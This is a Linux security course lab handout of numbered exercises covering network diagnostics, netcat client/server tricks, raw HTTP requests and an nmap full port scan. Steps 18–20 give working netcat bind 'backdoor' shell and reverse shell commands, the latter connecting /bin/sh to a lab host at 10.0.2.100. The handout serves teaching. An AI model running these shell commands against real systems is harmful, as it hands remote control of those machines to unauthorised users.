Lab Exercise #4: Simple Network Review and Hacking
Total Page:16
File Type:pdf, Size:1020Kb
CIS 290 – LINUX Security
Lab Exercise #4: Simple network review and hacking
1. Install under LINUX – netcat, nmap, Wireshark, firewall and configuration tools. 2. Display all interfaces: ifconfig –a, ifconfig down eth0, ifconfig up eth0 3. Display interface physical attributes: ethtool eth0 4. ping gateway 5. traceroute csc.oakton.edu 6. netstat –rn 7. arp –a 8. telnet csc.oakton.edu 9. netstat –an 10. Review /etc/sysconfig/network-scripts 11. route print, netstat -rn
Stupid network tricks using TELNET, netcat, nmap:
12. Simple client/server
nc -l 1111 nc 127.0.0.1 1111 This is a test This is a test. Ending communication with ^C (Ctrl-C) (Ctrl-C)
13. Simple file transfer
nc -l 1234 > test.out echo Hi There!!!!! | nc 127.0.0.1 1234
14. Client to web server echo -e "GET http://www.oakton.edu HTTP/1.0\n\n\n\n" | nc -w 5 www.oakton.edu 80
15. Or getting a server header:
echo -e "HEAD / HTTP/1.0\n\n" | nc 10.0.2.100 80
16. Web Host web.txt
Welcome to Bob's Webpage!!!!!!!!
cat web.txt | nc –l –v 80
Point browser to your system – http://127.0.0.1. CIS 290 – LINUX Security
Lab Exercise #4: Simple network review and hacking
17. Port scanning:
nmap –sT –p 1-65535
18. TELNET client/server nc -t -l 2323 | /bin/bash nc 127.0.0.1 2323 echo "Hi there" logout
19. “Backdoor” shell (-e option not in LINUX, note step 18 as bypass)
nc –e /bin/bash -l 2023 nc –v 127.0.0.1 2023
or telnet 127.0.0.1 2023
-e option not in LINUX
nc -l 2023 | /bin/bash provide access to bash builtin commands (no external executables.)
20. “Reverse” shell (-e option not in LINUX)
Local machine: nc -n -v -l -p 1234 Remote machine: nc -e /bin/sh 10.0.2.100 1234
21. Telnet to discovered ports: telnet